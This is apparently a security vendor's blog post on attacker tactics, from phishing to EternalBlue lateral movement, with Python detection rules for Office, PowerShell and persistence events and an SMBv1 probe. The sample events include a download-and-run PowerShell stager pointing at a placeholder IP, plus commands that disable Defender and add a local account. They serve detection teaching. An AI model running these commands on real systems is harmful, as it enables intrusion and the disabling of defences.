September 03, 2020 | By Ohn Klingher, Cyber Security Division
Hunting for Tactics
Gaining and elevating access has always been a topic of interest for both cyber defenders and adversaries. In this writeup we walk through the tactics, techniques and maneuvers adversaries use to get access to an enterprise network, and we examine several stages of an attack along the way.
Tactic 1 – Initial Access: techniques that use a variety of attack vectors to gain an initial foothold within an enterprise network.
The following examples illustrate how adversaries obtain that early access to an environment.
- Phishing for valid accounts – one of the most common forms of social engineering attack; it targets legitimate users in order to harvest their credentials.
The adversary, masquerading as a trusted entity, sends the targeted user a text message and/or email crafted to entice them into acting on it. Once the user takes the bait, the adversary can carry the campaign forward and impact the organization in several ways:
- install malware that spreads within the organization, for example as the delivery stage of a ransomware attack
- expand the campaign to steal sensitive information, commit identity theft or extort the victim
- use the captured credentials to log into externally reachable remote services
Credential theft begins when the legitimate user enters their username and password on a spoofed login page or in a reply to the malicious email. With those credentials the adversary can authenticate to organization services that are exposed to the internet, such as VPNs, Outlook Web Access (OWA) and remote desktops.
The same credentials may also grant elevated privileges on specific systems or access to restricted areas of the network, depending on what the phished user is entitled to.
- Execution via malicious attachments or links – adversaries also send malicious attachments or links to legitimate users with the intent of executing code on the user's machine.
For instance, an Office document carrying a macro can run a command that loads a specially crafted DLL or executes other custom commands, which typically gives the adversary code execution in the user's context. Once the file is opened and the macro runs, the Microsoft Office process (or an application it launches) may:
- establish a connection to an address that threat intelligence sources have tagged as malicious
- interact with other external addresses, which can affect the organization in further ways
- write a file with an executable extension to disk and launch it to cause more damage
- invoke a living-off-the-land binary (LOLBin) such as rundll32.exe or mshta.exe to execute commands in memory while evading traditional security controls
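The four behaviours above are exactly what a detection engineer watches for on the endpoint. The following is an added example written for this writeup, not code from the original post: a small set of rules run over constructed, Sysmon-style events (EventID 1 = process creation, 3 = network connection, 11 = file creation). The field names follow Sysmon; the sample events, the LOLBin list and the stand-in threat-intelligence list are assumptions made for the example.

```python
"""Flag the Office-process behaviours listed above.

Added example for this writeup, not code from the original post. It runs a few
detection rules over constructed, Sysmon-style events (EventID 1 = process
creation, 3 = network connection, 11 = file creation). The field names follow
Sysmon; the sample events, the threat-intel list and the LOLBin list are
assumptions made for the example.
"""
import ipaddress

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Living-off-the-land binaries that an Office document has little reason to spawn.
LOLBINS = {
    "rundll32.exe", "regsvr32.exe", "mshta.exe", "certutil.exe", "msiexec.exe",
    "wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe", "bitsadmin.exe",
}

EXECUTABLE_EXTS = (".exe", ".dll", ".scr", ".bat", ".vbs", ".js", ".hta")

# Paths a standard user can write to; binaries launched from here deserve a look.
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")

# Stand-in for a threat-intelligence feed of known-bad addresses (constructed).
TI_BAD_IPS = {"198.51.100.23"}

# RFC 1918 and loopback only. The documentation ranges (203.0.113.0/24 etc.)
# used in the sample events therefore count as external, which is what we want.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def analyse(events):
    """Return (rule, detail) findings for events involving Office processes."""
    findings = []
    for ev in events:
        image = basename(ev.get("Image", ""))
        parent = basename(ev.get("ParentImage", ""))
        if ev["EventID"] == 1 and parent in OFFICE_APPS:
            if image in LOLBINS:
                findings.append(("office_spawns_lolbin",
                                 f"{parent} -> {image}: {ev['CommandLine']}"))
            elif ev["Image"].lower().startswith(USER_WRITABLE):
                findings.append(("office_spawns_user_writable_binary",
                                 f"{parent} -> {ev['Image']}"))
        elif ev["EventID"] == 3 and image in OFFICE_APPS:
            ip = ev["DestinationIp"]
            if ip in TI_BAD_IPS:
                findings.append(("office_connects_to_known_bad", f"{image} -> {ip}"))
            # Outlook talks to mail servers all day; for the other apps an
            # external connection is unusual enough to surface.
            elif image != "outlook.exe" and not is_internal(ip):
                findings.append(("office_external_connection", f"{image} -> {ip}"))
        elif ev["EventID"] == 11 and image in OFFICE_APPS:
            target = ev["TargetFilename"]
            if target.lower().endswith(EXECUTABLE_EXTS):
                findings.append(("office_writes_executable", f"{image} wrote {target}"))
    return findings


WINWORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
OUTLOOK = r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE"

# Constructed sample events, roughly in the order the page describes them.
SAMPLE_EVENTS = [
    {"EventID": 1, "ParentImage": WINWORD, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Users\Public\update.dll,Start"},
    {"EventID": 1, "ParentImage": WINWORD, "Image": r"C:\Windows\splwow64.exe",
     "CommandLine": "splwow64.exe 8192"},                         # benign print helper
    {"EventID": 11, "Image": WINWORD,
     "TargetFilename": r"C:\Users\alice\AppData\Local\Temp\inv.exe"},
    {"EventID": 1, "ParentImage": WINWORD,
     "Image": r"C:\Users\alice\AppData\Local\Temp\inv.exe", "CommandLine": "inv.exe"},
    {"EventID": 3, "Image": WINWORD, "DestinationIp": "198.51.100.23"},
    {"EventID": 3, "Image": WINWORD, "DestinationIp": "203.0.113.77"},
    {"EventID": 3, "Image": OUTLOOK, "DestinationIp": "203.0.113.10"},  # normal for Outlook
    {"EventID": 3, "Image": WINWORD, "DestinationIp": "10.0.0.5"},      # internal, ignored
]

if __name__ == "__main__":
    for rule, detail in analyse(SAMPLE_EVENTS):
        print(f"{rule:38} {detail}")
```

Two design points carry over to real rules: the "spawns executable" check keys on the child's path (user-writable locations) rather than on the `.exe` extension, so legitimate Office helpers under C:\Windows do not fire, and the external-connection rule exempts Outlook, which would otherwise drown the queue.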
Tactic 2 – Execution: once an adversary has a foothold in the network, as illustrated above, they can run malicious code and attempt to elevate privileges.
Execution consists of techniques that result in adversary-controlled code running on local or remote systems. On Windows this often means a PowerShell script that performs remote system discovery, dumps credentials, and so on.
PowerShell – a tale of a command and scripting interpreter
As mentioned above, adversaries who use PowerShell can perform a wide range of actions, including extensive discovery and execution of code. One of the most common patterns is PowerShell running on a compromised user's system after initial exploitation to download files, execute fileless code, call the Windows API directly, and stay "under the radar", since it is a signed Microsoft binary present on every Windows host.
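The reason this pattern stays under the radar is that the script usually arrives as a `-EncodedCommand` argument, so a process-creation log shows only a base64 blob. The following is an added example written for this writeup, not code from the original post: it decodes that argument (PowerShell expects base64 of the UTF-16LE script) and scores the effective command line against download-cradle and evasion indicators. The indicator lists, the thresholds and the sample command lines are constructed assumptions.

```python
"""Decode PowerShell -EncodedCommand arguments and spot download cradles.

Added example for this writeup, not code from the original post. PowerShell
accepts a script as base64 of its UTF-16LE encoding, so a process-creation
log shows only an opaque blob; this decodes it and scores the effective
command line. The indicator lists and the sample command lines are
constructed assumptions for the example.
"""
import base64
import re

# Fragments of "fetch and run in memory" one-liners (lower-case, matched as substrings).
CRADLE_INDICATORS = (
    "net.webclient", "downloadstring", "downloadfile", "invoke-webrequest",
    "invoke-restmethod", "invoke-expression", "iex ", "frombase64string",
)

# Switches that are common in admin scripts on their own but stack up in malware.
EVASION_INDICATORS = (
    "-nop", "-noprofile", "-w hidden", "-windowstyle hidden",
    "-noni", "-noninteractive", "-exec bypass", "-executionpolicy bypass",
)

# -e, -ec, -en, -enc and the full name are all accepted by powershell.exe.
ENCODED_ARG = re.compile(
    r"(?i)[-/](?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/]{16,}={0,2})")


def decode_encoded_command(cmdline):
    """Return the plaintext script carried by -EncodedCommand, or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    blob = m.group(1)
    blob += "=" * (-len(blob) % 4)          # tolerate stripped padding
    try:
        return base64.b64decode(blob).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(cmdline):
    """Score a command line; the decoded script (if any) is scored together with it."""
    decoded = decode_encoded_command(cmdline)
    text = (cmdline + " " + (decoded or "")).lower()
    cradle = [i for i in CRADLE_INDICATORS if i in text]
    evasion = [i for i in EVASION_INDICATORS if i in text]
    return {
        "decoded": decoded,
        "cradle": cradle,
        "evasion": evasion,
        # Any cradle is worth a look; evasion switches alone need at least two.
        "suspicious": bool(cradle) or len(evasion) >= 2,
    }


def encode_for_powershell(script):
    """The transformation attackers apply (UTF-16LE, then base64); used to build the sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed samples. The first is a typical stager; the address is a documentation IP.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.23/a.ps1')"
SAMPLE_CMDLINES = [
    "powershell.exe -nop -w hidden -enc " + encode_for_powershell(STAGER),
    r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    "powershell.exe Get-Service -Name Spooler",
]

if __name__ == "__main__":
    for cl in SAMPLE_CMDLINES:
        r = triage(cl)
        print(("SUSPICIOUS " if r["suspicious"] else "ok         ") + (r["decoded"] or cl))
```

The second sample is deliberately left below the threshold: `-ExecutionPolicy Bypass` on its own is how a great many legitimate scheduled scripts are launched, and alerting on it alone buries the real hits.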
Tactic 3 – Persistence: once the adversary has executed the code they need, they look to maintain their foothold in the environment, which means surviving device reboots and similar disruptions.
Persistence consists of techniques that keep the adversary's access to systems across restarts, changes to the system and interruptions to network connectivity, any of which could otherwise cut them off from the compromised network. In this phase an adversary may modify system configuration (autorun registry keys and scheduled tasks are the classic examples), create accounts to retain access, or replace legitimate code or files, both to keep access and to avoid being discovered.
Tactic 4 – Defense Evasion: this phase consists of the techniques adversaries use to avoid detection.
This primarily includes disabling or uninstalling existing security controls, and abusing or masquerading as common system processes that do not look suspicious, for instance explorer.exe or svchost.exe. Adversaries also commonly try to escalate privileges by bypassing User Account Control (UAC) to obtain an elevated token before executing the malicious payload.
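Both of the last two tactics leave tell-tale host events: registry writes to autorun keys, scheduled-task and account creation, and commands that switch off security controls. The following is an added example written for this writeup, not code from the original post, covering the persistence mechanisms and the control-tampering behaviour from the two sections above. It triages constructed Sysmon-style events (EventID 13 = registry value set, EventID 1 = process creation); the field names follow Sysmon, while the rules, severities and samples are assumptions made for the example.

```python
"""Triage host events for persistence and defence-evasion activity.

Added example for this writeup, not code from the original post. It covers the
persistence mechanisms and the control-tampering behaviours described in the two
sections above, using constructed Sysmon-style events (EventID 13 = registry
value set, EventID 1 = process creation). Field names follow Sysmon; the rules,
severities and samples are assumptions for the example.
"""
import re

# Registry locations that run a program at logon or boot (lower-case substrings).
AUTORUN_KEYS = (
    "\\currentversion\\run\\", "\\currentversion\\runonce\\",
    "\\currentversion\\winlogon\\userinit", "\\currentversion\\winlogon\\shell",
)

USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")

NET_USER_ADD = re.compile(r"\bnet1?(?:\.exe)?\s+user\s+\S+\s+\S+\s+/add\b")
SERVICE_TAMPER = re.compile(
    r"\b(?:sc|net)(?:\.exe)?\s+(?:stop|config|delete)\s+(?:windefend|sense|mpssvc|wscsvc)\b")


def mentions_user_writable(text):
    return any(p in text.lower() for p in USER_WRITABLE)


def triage_event(ev):
    """Return (rule, severity, detail) for one event, or None if it is uninteresting."""
    if ev["EventID"] == 13:
        key = ev["TargetObject"].lower()
        if any(k in key for k in AUTORUN_KEYS):
            # An autorun entry pointing into a user-writable path is the classic
            # user-level persistence; one under Program Files is usually software.
            sev = "high" if mentions_user_writable(ev["Details"]) else "info"
            return ("autorun_registry_write", sev, f"{ev['TargetObject']} = {ev['Details']}")
        return None
    if ev["EventID"] == 1:
        cl = ev["CommandLine"]
        low = cl.lower()
        if "schtasks" in low and "/create" in low:
            sev = "high" if mentions_user_writable(cl) else "medium"
            return ("scheduled_task_created", sev, cl)
        if NET_USER_ADD.search(low):
            return ("local_account_created", "high", cl)
        if "set-mppreference" in low and "-disablerealtimemonitoring" in low and "$true" in low:
            return ("defender_realtime_disabled", "high", cl)
        if SERVICE_TAMPER.search(low):
            return ("security_service_tampered", "high", cl)
    return None


def triage(events):
    return [f for f in (triage_event(ev) for ev in events) if f]


RUN_KEY = r"\Software\Microsoft\Windows\CurrentVersion\Run"
SVC = r"C:\Users\alice\AppData\Roaming\svc.exe"

# Constructed sample events.
SAMPLE_EVENTS = [
    {"EventID": 13, "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001" + RUN_KEY + r"\Updater",
     "Details": SVC},
    {"EventID": 1, "CommandLine": f"schtasks /create /sc onlogon /tn Updater /tr {SVC}"},
    {"EventID": 1, "CommandLine": "net user backup_svc Summer2020! /add"},
    {"EventID": 1, "CommandLine": "powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"EventID": 1, "CommandLine": "sc config WinDefend start= disabled"},
    {"EventID": 13, "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "Details": r"C:\Program Files\Microsoft OneDrive\OneDrive.exe /background"},   # benign
    {"EventID": 1, "CommandLine": "schtasks /query /tn Updater"},                 # benign
]

if __name__ == "__main__":
    for rule, sev, detail in triage(SAMPLE_EVENTS):
        print(f"[{sev:6}] {rule:28} {detail}")
```

The severity split on the autorun rule is the practical part: every Windows host writes Run keys during software installs, so the path of the target, not the key itself, is what separates persistence from noise.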
Tactic 5 – Lateral Movement: moving through the environment is a crucial stage in which adversaries explore the network to find targets of interest and then gain access to them. To achieve this, they install and operate remote access tools to footprint the environment, stay persistent, and move laterally within the network.
Once adversaries on the network manage to exploit a particular service, piece of software or operating system (remote services, for instance), the damage to internal systems can be substantial. A remote code execution flaw in Windows SMB allows lateral movement without any credentials at all. One example that cannot be forgotten is the EternalBlue exploit against SMB, which had a massive impact across organizations (remember WannaCry?).
EternalBlue and the exploitation tools built on it rely on multiple vulnerabilities in the Windows implementation of the SMB protocol, specifically the SMBv1 server listening on TCP port 445. Microsoft released patches for these vulnerabilities under MS17-010, covering the affected versions from Windows XP and Windows Server 2008 through Windows 7 and even Windows 10, yet hosts that remain unpatched, or that still expose SMBv1 where it is not needed, remain at risk. Disabling SMBv1 where it is not required removes this attack surface entirely.
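The first question a defender asks about MS17-010 exposure is therefore whether a host still negotiates SMBv1 at all. The following is an added example written for this writeup, not code from the original post or from any exploit: it builds the SMB_COM_NEGOTIATE request a client sends on TCP 445 and reads which dialect the server selects. A server that picks "NT LM 0.12" has SMBv1 enabled, which is the exposure condition, not proof of the vulnerability; a patched host with SMBv1 left on answers the same way. The reply bytes used for the self-test are constructed, and the `probe` function only makes sense against hosts you are authorized to test.

```python
"""SMB1 dialect negotiation: does a server still speak SMBv1?

Added example for this writeup, not code from the original post. It builds the
SMB_COM_NEGOTIATE request a client sends on TCP 445 and reads which dialect the
server picked. A server that selects "NT LM 0.12" has SMBv1 enabled, which is
the exposure condition for MS17-010, not proof of the vulnerability itself.
The reply bytes used for the self-test are constructed.
"""
import socket
import struct
import sys

SMB_COM_NEGOTIATE = 0x72
NO_DIALECT = 0xFFFF                      # server accepted none of the offered dialects
DIALECTS = [b"PC NETWORK PROGRAM 1.0", b"LANMAN1.0", b"Windows for Workgroups 3.1a",
            b"LM1.2X002", b"LANMAN2.1", b"NT LM 0.12"]


def smb1_header(command, flags=0x18, flags2=0xC801):
    """32-byte SMB1 header: magic, command, NT status, flags, flags2, PIDHigh,
    security features, reserved, TID, PIDLow, UID, MID (little-endian).
    flags2 0xC801 = Unicode | NT status codes | extended security | long names."""
    return struct.pack("<4sBIBHH8sHHHHH", b"\xffSMB", command, 0, flags, flags2,
                       0, b"\x00" * 8, 0, 0, 0xFEFF, 0, 0)


def negotiate_request(dialects=DIALECTS):
    """NetBIOS session header + SMB1 header + WordCount(0) + ByteCount + dialect list."""
    body = b"".join(b"\x02" + d + b"\x00" for d in dialects)   # 0x02 = dialect string type
    smb = smb1_header(SMB_COM_NEGOTIATE) + struct.pack("<BH", 0, len(body)) + body
    return struct.pack(">I", len(smb)) + smb                      # type 0x00 + 3-byte length


def parse_negotiate_response(data):
    """Selected dialect index from a raw reply, or None if it is not an SMB1 negotiate reply."""
    if len(data) < 4 + 32 + 3 or data[4:8] != b"\xffSMB":      # \xfeSMB would be SMB2
        return None
    smb = data[4:]
    command, word_count = smb[4], smb[32]
    if command != SMB_COM_NEGOTIATE or word_count < 1:
        return None
    return struct.unpack_from("<H", smb, 33)[0]                # DialectIndex is the first word


def negotiated_smb1_dialect(reply, dialects=DIALECTS):
    """The SMBv1 dialect the server chose, or None if it does not speak SMBv1."""
    idx = parse_negotiate_response(reply)
    if idx is None or idx == NO_DIALECT or idx >= len(dialects):
        return None
    return dialects[idx]


def probe(host, port=445, timeout=3.0):
    """Send the request to a live host; a reset or silence is reported as 'no SMBv1'."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(negotiate_request())
            return negotiated_smb1_dialect(s.recv(4096))
    except (OSError, socket.timeout):
        return None


def constructed_reply(dialect_index, word_count=17):
    """Constructed negotiate reply with only the fields read above populated
    (a real NT LM 0.12 reply carries 17 parameter words)."""
    words = struct.pack("<H", dialect_index) + b"\x00" * (2 * word_count - 2)
    smb = smb1_header(SMB_COM_NEGOTIATE, flags=0x98) + bytes([word_count]) + words + b"\x00\x00"
    return struct.pack(">I", len(smb)) + smb


REPLY_SMB1_ENABLED = constructed_reply(DIALECTS.index(b"NT LM 0.12"))
REPLY_NO_COMMON_DIALECT = constructed_reply(NO_DIALECT, word_count=1)
REPLY_SMB2_ONLY = b"\x00\x00\x00\x40" + b"\xfeSMB" + b"\x00" * 60

if __name__ == "__main__":
    if len(sys.argv) > 1:
        print(sys.argv[1], "->", probe(sys.argv[1]))
    else:
        for name, reply in (("smb1 enabled", REPLY_SMB1_ENABLED),
                            ("no common dialect", REPLY_NO_COMMON_DIALECT),
                            ("smb2 only", REPLY_SMB2_ONLY)):
            print(f"{name:18} {negotiated_smb1_dialect(reply)}")
```

Run with no arguments it exercises the three constructed replies; with a host name it sends the real request. Whether a host that does negotiate SMBv1 is actually missing the MS17-010 update is a separate question, answered by patch inventory or a dedicated MS17-010 check, not by this exchange.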
Stay Safe with TrustNet!